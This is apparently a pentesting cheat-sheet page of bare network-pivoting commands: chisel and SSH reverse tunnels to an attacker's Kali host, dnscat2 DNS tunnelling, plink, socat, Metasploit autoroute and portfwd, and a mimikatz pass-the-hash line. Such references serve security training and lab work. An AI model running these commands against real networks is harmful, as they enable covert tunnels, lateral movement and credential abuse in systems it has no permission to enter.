chisel client kali:port R:socks
Alert! To view more content, click the description below a terminal command.
chisel client kali:port R:socks
dnscat2-server domain
proxychains ssh -N -D 1081 user@hop2
base64 file > file.b64
interface_add_route --name ligolo --route subnet
run autoroute -s subnet
portfwd add -l localport -p remoteport -r remotehost
netsh interface portproxy add v4tov4
plink.exe -ssh -l user -pw pass -R port:host:port attacker
proxychains nmap target
sekurlsa::pth /run:"mstsc.exe /restrictedadmin"
ssh -N -D port user@pivot
ssh -N -L localport:dest:destport user@pivot
ssh -N -R port user@kali
ssh -N -R kalilisten:dest:destport user@kali
socat TCP-LISTEN:port,fork TCP:dest:port
net view 10.4.26.4
sudo systemctl start rinetd
sshuttle -r user@pivot subnet